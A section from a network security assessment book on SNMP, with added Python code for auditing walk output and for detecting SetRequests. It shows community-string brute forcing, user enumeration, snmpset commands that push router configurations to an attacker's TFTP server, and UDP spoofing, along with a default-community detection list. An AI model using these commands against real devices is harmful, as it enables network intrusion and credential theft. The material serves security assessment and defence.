5.6 SNMP


The Simple Network Management Protocol (SNMP) service listens on UDP port 161. SNMP is often found running on network infrastructure devices such as managed switches, routers, and other appliances. Increasingly, SNMP can be found running on Unix-based and Windows servers for central network management purposes.

SNMP authentication is very simple and is sent across networks in plaintext. SNMP Management Information Base (MIB) data can be retrieved from a device by specifying the correct read community string, and SNMP MIB data can be written to a device using the correct write community string. MIB databases contain listings of Object Identifier (OID) values, such as routing table entries, network statistics, and details of network interfaces. Accessing a router MIB is useful when performing further network reconnaissance and mapping.

Two useful tools used by attackers and security consultants alike for brute-forcing SNMP community strings and accessing MIB databases are ADMsnmp and snmpwalk.

5.6.1 ADMsnmp

ADMsnmp is available from the ADM group home page at http://adm.freelsd.net/ADM/. The utility is an effective Unix command-line SNMP community string brute-force utility. Example 5-13 shows the tool in use against a Cisco router at 192.168.0.1 to find that the community string private has write access.

Example 5-13. ADMsnmp used to brute-force SNMP community strings
# ADMsnmp 192.168.0.1
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<
>>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
>>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<
>>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<
>>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<
>>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=all private  id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name= private  id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>
<!ADM!>         snmp check on pipex-gw.trustmatta.com       <!ADM!>
sys.sysName.0:pipex-gw.trustmatta.com name = private write access

5.6.2 snmpwalk

The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of tools available from http://net-snmp.sourceforge.net. The Net-SNMP toolkit can be built on both Unix and Windows platforms and contains other useful utilities including snmpset, which can modify and set specific OID values. snmpwalk is used with a valid community string to download the entire MIB database from the target device (unless a specific OID value to walk is provided by the user).

Example 5-14 shows snmpwalk being used to download the MIB database from a Cisco router. The MIB in this example is over seven pages in length, so for brevity, only the first eight OID values are presented here.

Example 5-14. Accessing the MIB using snmpwalk
# snmpwalk -c public 192.168.0.1
system.sysDescr.0 = Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-IS-M), Version 12.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Wed 11-Aug-99 00:16 by phanguye
system.sysObjectID.0 = OID: enterprises.9.1.186
system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28
system.sysContact.0 =
system.sysName.0 = pipex-gw.trustmatta.com
system.sysLocation.0 =
system.sysServices.0 = 78
system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00

5.6.3 Default Community Strings

Most routers, switches, and wireless access points from Cisco, 3Com, Foundry, D-Link, and other companies use public and private as their respective default read and write SNMP community strings. The community string list provided with the ADMsnmp brute-force program includes cisco, router, enable, admin, read, write, and other obvious values. When assessing routers or devices belonging to a specific organization, you should tailor your list accordingly (including the company name and other values that may be used in that instance).

Many Cisco routers have two default SNMP community strings embedded into them: cable-docsis and ILMI. These strings don't appear in the IOS config files, and you should review the process in the official Cisco security advisory at http://www.cisco.com/warp/public/707/ios-snmp-community-vulns-pub.shtml to remove these default community strings.


5.6.4 Compromising Devices by Reading from SNMP

Many Windows NT and 2000 servers run SNMP services, using the community string of public for read access. By walking through the 1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, you can enumerate usernames of active accounts on the target host; 192.168.0.251 is used in Example 5-15.

Example 5-15. Enumerating Windows 2000 user accounts through SNMP
# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.101.115.115 = "Chris"
enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IUSR_CARTMAN"
enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IWAM_CARTMAN"
enterprises.77.1.2.25.1.1.114.97.116.111.114 = "Administrator"
enterprises.77.1.2.25.1.1.116.85.115.101.114 = "TsInternetUser"
enterprises.77.1.2.25.1.1.118.105.99.101.115 = "NetShowServices"

In this example, the usernames Chris and Administrator are identified, along with the built-in Windows IUSR_hostname, IWAM_hostname, TsInternetUser, and NetShowServices users.

Various wireless access points and other hardware appliances contain passwords and details of writable community strings within the accessible MIB. You should check each OID value in the MIB databases of these devices because sensitive information can be easily obtained.


SNMP OID values can be fed to tools such as snmpwalk in both numerical and word form. Table 5-2 lists values that are useful when enumerating services and open shares of Windows NT family servers found running SNMP.

Table 5-2. Useful Windows NT family SNMP OID values

OID                          Information gathered
.1.3.6.1.2.1.1.5             Hostnames
.1.3.6.1.4.1.77.1.4.2        Domain name
.1.3.6.1.4.1.77.1.2.25       Usernames
.1.3.6.1.4.1.77.1.2.3.1.1    Running services
.1.3.6.1.4.1.77.1.2.27       Share information
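The following Python script is an added example for this section (it is not code from the book) that turns raw snmpwalk output from a Windows NT family host into the categories of Table 5-2, which is a quick way to audit what one of your own agents is exposing. It goes a little beyond the table: it accepts both the numeric form (snmpwalk -On) and the older enterprises. form shown in Example 5-15, and it decodes the row indexes of the lanmgr tables, which carry the username, service name or share name as a length-prefixed string of ASCII subidentifiers (the 5.67.104.114.105.115 tail of a username row is the length 5 followed by the codes for Chris). The sample output lines, the host CARTMAN, the domain LABDOMAIN and the DATA share are all constructed; the length-prefixed index encoding is assumed from the standard rule for variable-length table indexes.

```python
import re

# OID prefixes from Table 5-2 and what each one exposes on a Windows NT
# family SNMP agent (numeric form).
TABLE_5_2 = {
    ".1.3.6.1.2.1.1.5": "hostname",
    ".1.3.6.1.4.1.77.1.4.2": "domain name",
    ".1.3.6.1.4.1.77.1.2.25": "username",
    ".1.3.6.1.4.1.77.1.2.3.1.1": "running service",
    ".1.3.6.1.4.1.77.1.2.27": "share",
}

# Constructed snmpwalk output (not captured from a real host): a mix of the
# numeric form and the "enterprises." form seen in Example 5-15.
SAMPLE_WALK = [
    '.1.3.6.1.2.1.1.5.0 = STRING: "CARTMAN"',
    '.1.3.6.1.4.1.77.1.4.2.0 = STRING: "LABDOMAIN"',
    '.1.3.6.1.4.1.77.1.2.25.1.1.5.67.104.114.105.115 = STRING: "Chris"',
    'enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = "Administrator"',
    '.1.3.6.1.4.1.77.1.2.27.1.1.4.68.65.84.65 = STRING: "DATA"',
    r'.1.3.6.1.4.1.77.1.2.27.1.2.4.68.65.84.65 = STRING: "C:\Data"',
    '.1.3.6.1.4.1.77.1.2.3.1.1.8.83.99.104.101.100.117.108.101 = STRING: "Schedule"',
    '.1.3.6.1.2.1.1.3.0 = Timeticks: (86128) 0:14:21.28',  # not in Table 5-2, ignored
]

# "<oid> = [TYPE:] [\"]value[\"]" with an optional Net-SNMP type tag.
_LINE = re.compile(r'^(?P<oid>\S+)\s*=\s*(?:[A-Za-z]+:\s*)?"?(?P<value>.*?)"?\s*$')


def parse_oid(text):
    """Turn '.1.3.6...' or 'enterprises.77...' into a list of integers."""
    if text.startswith("enterprises."):
        text = ".1.3.6.1.4.1." + text[len("enterprises."):]
    return [int(part) for part in text.strip(".").split(".")]


def decode_index(suffix):
    """Decode a length-prefixed string of ASCII subidentifiers (assumed index
    encoding of the lanmgr tables). Returns None for scalars (.0) or when no
    printable, correctly sized string is present."""
    for i, length in enumerate(suffix):
        rest = suffix[i + 1:]
        if length and length == len(rest) and all(32 <= c < 127 for c in rest):
            return "".join(chr(c) for c in rest)
    return None


def classify(line):
    """Map one snmpwalk line to its Table 5-2 category, or None if unlisted."""
    match = _LINE.match(line)
    if not match:
        return None
    oid = parse_oid(match.group("oid"))
    for prefix, what in TABLE_5_2.items():
        p = parse_oid(prefix)
        if oid[:len(p)] == p:  # compare whole subidentifiers, not text prefixes
            return {"what": what, "index": decode_index(oid[len(p):]),
                    "value": match.group("value")}
    return None


def audit_walk(lines):
    """Group every line that falls under Table 5-2 by what it discloses."""
    found = {}
    for line in lines:
        hit = classify(line)
        if hit:
            found.setdefault(hit["what"], []).append(hit)
    return found


if __name__ == "__main__":
    for what, hits in audit_walk(SAMPLE_WALK).items():
        for hit in hits:
            print(f"{what:16} index={hit['index']!r:18} value={hit['value']!r}")
```

Pipe real output in with snmpwalk -On so the OIDs arrive in numeric form; the enterprises. handling exists only for older UCD-SNMP output such as Example 5-15. Share rows come back twice (name column .1 and path column .2) under the same decoded index, which is how the index decoding makes the walk readable.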

5.6.5 Compromising Devices by Writing to SNMP

It is possible to compromise a Cisco IOS or Ascend device running SNMP if you have write access to the SNMP MIB. By first running a TFTP server on an accessible host, you can modify particular OID values on the target device over SNMP (using snmpset), so that the device configuration file containing direct access passwords can be uploaded through TFTP. Here are some examples of this attack against Cisco IOS and Ascend network devices:

Compromising a Cisco device using snmpset:

# snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config"

Compromising an Ascend device using snmpset:

# snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.3.0 a "192.168.0.50"
# snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0 s "ascend-config"

For these attacks to work, you must install and configure an accessible TFTP server to which the appliance can upload its configuration file. This can be achieved from a Unix-based platform by modifying the /etc/inetd.conf file to run tftpd from inetd, or by using a Windows TFTP server, such as the Cisco TFTP Server (available from http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp). One key point to remember when performing this exploit is to ensure your TFTP server is writable so that the target device can upload its configuration file!

SNMP running on hardware appliances can be imaginatively abused by writing to a plethora of different OID values (e.g., modification of routing tables or uploading new firmware and configuration files). It is often best to test SNMP attacks in a lab environment before performing them on live networks, to avoid crashing routers, switches, and other critical infrastructure devices.

A damaging extension to attacks involving writing to remote devices via SNMP is to use UDP spoofing. If the SNMP service listening on the target router doesn't respond to packets sent from the attacker's Internet-based hosts, he can spoof the snmpset command string (as in the previous command-line examples) to appear from a trusted host, such as an external firewall IP address. Obviously, he would need to find the correct community string, but it certainly is an imaginative way around the host-based ACLs of the router.
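The defensive counterpart to this section and to the plaintext authentication described at the start of 5.6, as an added example that is not code from the book: a small Python decoder for the BER structure of an SNMPv1 message (what snmpwalk and snmpset put on the wire), run over a constructed SetRequest that carries the Cisco configuration-write OID from the examples above. It shows that the community string is readable straight out of the datagram, and it raises the alerts a sensor on UDP port 161 should produce: a default or guessable community from the Section 5.6.3 list, any SetRequest at all, and a SetRequest to one of the configuration-upload OIDs shown in this section. The packet bytes, request id and alert wording are constructed for this example; the OID prefixes are the ones quoted in the snmpset examples.

```python
# Minimal BER/SNMPv1 decoder plus a detection pass. Tags used: 0x30 SEQUENCE,
# 0x02 INTEGER, 0x04 OCTET STRING, 0x06 OBJECT IDENTIFIER, 0xa0-0xa4 PDU types.

PDU_TYPES = {0xa0: "GetRequest", 0xa1: "GetNextRequest", 0xa2: "GetResponse",
             0xa3: "SetRequest", 0xa4: "Trap"}

# Community strings named in Section 5.6.3 as vendor defaults or obvious guesses.
DEFAULT_COMMUNITIES = {"public", "private", "cisco", "router", "enable",
                       "admin", "read", "write", "cable-docsis", "ILMI"}

# OID prefixes from the snmpset examples in Section 5.6.5: a SetRequest under
# these asks the device to push its configuration file to a TFTP server.
CONFIG_UPLOAD_OIDS = {
    ".1.3.6.1.4.1.9.2.1.55": "Cisco IOS configuration write to TFTP host",
    ".1.3.6.1.4.1.529.9.5": "Ascend configuration upload to TFTP host",
}

# Constructed SNMPv1 SetRequest, hand-encoded for this example: community
# "private", one varbind setting .1.3.6.1.4.1.9.2.1.55.192.168.0.50 = "cisco-config".
SAMPLE_SETREQUEST = bytes.fromhex(
    "30 3a"                        # SEQUENCE, 58 bytes
    "02 01 00"                     # version INTEGER 0 = SNMPv1
    "04 07 70 72 69 76 61 74 65"   # community OCTET STRING "private"
    "a3 2c"                        # SetRequest-PDU, 44 bytes
    "02 01 01"                     # request-id 1
    "02 01 00"                     # error-status 0
    "02 01 00"                     # error-index 0
    "30 21"                        # VarBindList, 33 bytes
    "30 1f"                        # VarBind, 31 bytes
    "06 0f 2b 06 01 04 01 09 02 01 37 81 40 81 28 00 32"  # name OID
    "04 0c 63 69 73 63 6f 2d 63 6f 6e 66 69 67"           # value "cisco-config"
)


def read_tlv(buf, pos=0):
    """Read one BER tag-length-value at pos (definite-length form only).
    Returns (tag, value_bytes, position_after)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:              # long form: low 7 bits give the length's byte count
        n = length & 0x7f
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    """Decode base-128 subidentifiers; the first byte packs the first two."""
    subids = [raw[0] // 40, raw[0] % 40]
    value = 0
    for byte in raw[1:]:
        value = (value << 7) | (byte & 0x7f)
        if not byte & 0x80:        # a clear high bit ends the subidentifier
            subids.append(value)
            value = 0
    return "." + ".".join(str(s) for s in subids)


def parse_snmpv1(packet):
    """Return the fields of an SNMPv1 Get/GetNext/Set/Response message."""
    tag, msg, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, p = read_tlv(msg)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    if pdu_tag == 0xa4:
        raise ValueError("Trap PDUs have a different layout; not handled here")
    _, request_id, p = read_tlv(pdu)
    _, _error_status, p = read_tlv(pdu, p)
    _, _error_index, p = read_tlv(pdu, p)
    _, varbinds, _ = read_tlv(pdu, p)
    bindings, p = [], 0
    while p < len(varbinds):
        _, vb, p = read_tlv(varbinds, p)
        _, name, q = read_tlv(vb)
        vtag, value, _ = read_tlv(vb, q)
        shown = value.decode("latin-1") if vtag == 0x04 else value.hex()
        bindings.append((decode_oid(name), shown))
    return {
        "version": int.from_bytes(version, "big", signed=True),
        "community": community.decode("latin-1"),   # travels in cleartext
        "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag)),
        "request_id": int.from_bytes(request_id, "big", signed=True),
        "bindings": bindings,
    }


def assess(packet):
    """Decode one UDP/161 payload; return (fields, list of alert strings)."""
    msg = parse_snmpv1(packet)
    alerts = []
    if msg["community"] in DEFAULT_COMMUNITIES:
        alerts.append(f"default or guessable community '{msg['community']}' sent in cleartext")
    if msg["pdu"] == "SetRequest":
        alerts.append("SetRequest: a write community string is in use against this device")
        for oid, value in msg["bindings"]:
            for prefix, what in CONFIG_UPLOAD_OIDS.items():
                if oid == prefix or oid.startswith(prefix + "."):
                    alerts.append(f"{what}: {oid} = {value!r}")
    return msg, alerts


if __name__ == "__main__":
    fields, found = assess(SAMPLE_SETREQUEST)
    print(fields)
    for line in found:
        print("ALERT:", line)
```

Because the request arrives in a single UDP datagram with no handshake, the source address is not evidence of anything, which is exactly the spoofing problem described above; the decoder therefore belongs on a network tap or in the device's own logging rather than on a host-based ACL, and the durable fix is to replace v1/v2c community strings with SNMPv3 authentication and privacy, or at the very least non-default communities restricted to management addresses.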

5.6.6 SNMP Process-Manipulation Vulnerabilities

SNMP services running as part of Compaq Insight Manager and various firmware found running on hardware such as Linksys routers, Compaq, and ORiNOCO wireless access points are publicly known to be vulnerable to various simple and complex process-manipulation attacks.

In February 2002, CERT issued an advisory detailing multiple vulnerabilities in many SNMP implementations, accessible at http://www.cert.org/advisories/CA-2002-03.html. On Solaris and other Unix-based platforms, at least, these vulnerabilities led to host compromises. Many operating systems and software suites were affected, including systems from the following vendors:

  • Cisco Systems

  • Cray

  • F5 Networks

  • Hewlett-Packard

  • IBM

  • Microsoft

  • Oracle

  • Sun Microsystems

For current information relating to known SNMP issues, search the MITRE CVE list or check sites such as CERT or ISS X-Force. At the time of writing, the CERT knowledge base at http://www.kb.cert.org/vuls/ lists several remotely exploitable vulnerabilities in SNMP (not including denial of service or locally exploitable bugs), as shown in Table 5-3.

Table 5-3. Remotely exploitable SNMP vulnerabilities

CERT ID     Date        Notes
VU#154976   13/03/2001  Solaris /opt/SUNWssp/bin/snmpd buffer overflow
VU#648304   15/03/2001  Solaris SNMP daemon (snmpXdmid) buffer overflow
VU#854306   12/02/2002  Multiple vulnerabilities in SNMPv1 request handling
VU#107186   12/02/2002  Multiple vulnerabilities in SNMPv1 trap handling
VU#377003   16/09/2002  Hewlett Packard JetDirect-enabled printers disclose administrative passwords in hex format via SNMP



Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Pages: 166
Authors: Chris McNab